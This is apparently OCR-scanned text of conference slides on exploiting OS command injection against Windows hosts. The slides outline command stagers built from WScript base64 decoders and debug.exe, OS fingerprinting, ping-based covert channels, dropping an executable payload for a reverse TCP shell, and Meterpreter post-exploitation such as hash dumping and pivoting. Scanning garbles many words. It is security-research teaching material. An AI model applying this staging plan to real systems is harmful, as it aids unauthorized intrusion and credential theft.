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Definition 

Command injection is an attack method in which a hacker alters 
dynamically generated content on a Web page by entering HTML 
code into an input mechanism, such as a form field that lacks 
effective validation constraints. A malevolent hacker (also known 
as a cracker) can exploit that vulnerability to gain unauthorized 
access to data or network resources. When users visit an affected 
Web page, their browsers interpret the code, which may cause 
malicious commands to execute in the users' computers and 
across their networks. 
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Definition 

An attack technique used to take advantage of a vulnerability 
which results in the execution of operating-system commands 
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Our Focus 



OS Command Injection (to be specific) 



Windows Operating Systems 



Less useful toolset to work with compared to UNIX, Linux, etc 



Harder to work with post exploitation 
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Examples 

CVE-2009-3845 - HP OpenView NNM Perl CGI 



CVE-2008-5516- 



gitweb common repository web interface used by 
open source projects 



CVE-2007-3670 - 



The infamous IE FirefoxlIRL protocol handler bug 
Spawned many related issues 
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Current B<pl oi ts 



Typically a low level of sophistication 



Most are for Unix/Linux environments 




Most use network related commands for file transfer, etc 
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Expl oi tati on Gonsi derati on 

Some Operating Systems only < 



Command length limits 

XP / Win2k3 / Vista 
Win2k 

Win95 / 98 



Blind injections 




rffer a small set of commands 
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Expl oi tati on Gonsi derati ons 

Commands available on all Operating System targets 



Common command flags 



Writable/Executable directories 



Metacharacter Filters 
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Gbi ng Beyond Si mpl e Commands 

Upload binary payloads 
Gives us more options 



More features 



Meterpreter FTW!!! 



Command I nj ecti on 











10 



WScript 




Network FU 



FTP/TFTP 



Fileshares 



Mount Remote Drives 



rep 
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Pros 

Fast downloads 



Easily scripted 



Low Overhead (no encoding needed) 
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Firewalls 



Web Filters 




Reliability 
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Non-network Fu 



Debug.exe (Not supported on Windows Vista/7) 




WScript 



Scripting. FileSystemObject 



batch2binary 
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Pros 

Use existing connection 



Bypasses firewalls 



Works in harsh environments 
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Slower downloads (need to use buffering to prevent errors) 
Complex scripting 

Overhead (binary to ASCII conversion) 





ifjl 
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Desi gni ng a Gommand Stager 

Must be reliable 
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Capable of sending any potential payload 




Reuse existing connections (bypass firewalls) 



Clean up after itself (Non-persistent) 



Stream buffering of data 



Reasonably fast 
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Bi nary to ASO I Gonversi on 

Could use base64 




ASCII representation of hex (0x35 = 0x33 0x35) 



Ruby: hex = exe.unpack("H*")[0] 



Many options 
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C6 Detecti on 



We can use If exists' to detect the OS 



Check for debug.exe (XP or prior) 



Echo a 2048 byte long line to a file (XP) 




Echo a < 2048 byte long line to a file (Win2k or prior) 



Boot.ini grep/find for a string (XP and prior) 
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Usi ng Govert Channel s 

Ping.exe can be used to send messages fairly reliably 
Even the harshest of environments typically allow outgoing ICMP 



We can use packet size as our status indicator 
Using the number of packets to send is overkill 
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Plan of Attack 



The most reliable option is Non-Network Fu 




WScript decoder stub (decode a base64 encoded file) 




Drop the payload as an executable file and run it 



Reverse TCP connections are probably best (Reverse TCP All 
ports even better) 
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Demo time 
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Cod( 
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Meterpreter FTW! 

An agent which provides a lot of post exploitation capabilities 



Dump Hashes 



Upload/Download files 



Pivoting 



Local Privilege Escalation 
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Conclusion 



Current command injection exploitation techniques are lacking 



Reusing existing connections more reliable 



WScript is on all windows operating systems 




Meterpreter Rocks for post exploitation! 
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Questions 




